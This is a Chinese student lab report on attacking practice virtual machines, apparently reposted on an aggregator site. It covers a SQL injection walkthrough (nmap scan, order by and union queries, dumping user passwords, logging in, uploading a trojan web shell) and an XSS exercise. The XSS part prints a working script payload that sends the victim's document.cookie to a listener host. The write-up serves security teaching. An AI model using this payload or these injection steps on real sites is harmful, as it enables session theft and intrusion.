实验五

Posted p201521410037

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了实验五相关的知识,希望对你有一定的参考价值。

一、sql注入靶机攻击

 

首先搭建虚拟机 kali扫描下当前网段

 技术分享图片

 

 使用nmap扫描端口

 技术分享图片

 

打开该虚拟机提供的网页可查看网页各信息

 技术分享图片

 

id=2后加一个引号,网页报错 说明该网站存在sql注入漏洞

 技术分享图片

 

使用order by语句试出网站后台数据库表的列数 1-4均显示正常网页如下图,当order by 5 时网页报错

 技术分享图片

技术分享图片

 

 

使用联合查询 查看网页的显示位

 技术分享图片

 

得到显示位就可以显示数据库的名字 photoblog

 技术分享图片

 

得到数据库名字 可以顺藤摸瓜查询数据库中的表

 技术分享图片

 

可得三列元素

 技术分享图片

 

查看user表中的数据得到用户名及密码

 技术分享图片

 

 

 

 技术分享图片

技术分享图片

 

 技术分享图片

 

 尝试登陆

 技术分享图片

技术分享图片

 

 

可尝试上传文件

 技术分享图片

技术分享图片

 

上传木马文件后得到目录列表可以对其进行进一步操作

 技术分享图片

 

二、xss靶机攻击

首先与上一个实验相同并打开网页

 技术分享图片

技术分享图片

技术分享图片

技术分享图片

技术分享图片

 

在靶机上留言<script>document.write(‘<img src="http://192.168.112.132/?‘+document.cookie+‘ "/>‘)</script>并在本机开启80端口监听

 技术分享图片

 

以上是关于实验五的主要内容,如果未能解决你的问题,请参考以下文章

2018-2019-2 20175306实验五《网络编程与安全》实验报告

计算机系统 实验五 Cache实验

2017-2018-2 20165209 实验五《网络编程与安全》实验报告

区块链技术与应用实验报告(实验五)

区块链技术与应用实验报告(实验五)

区块链技术与应用实验报告(实验五)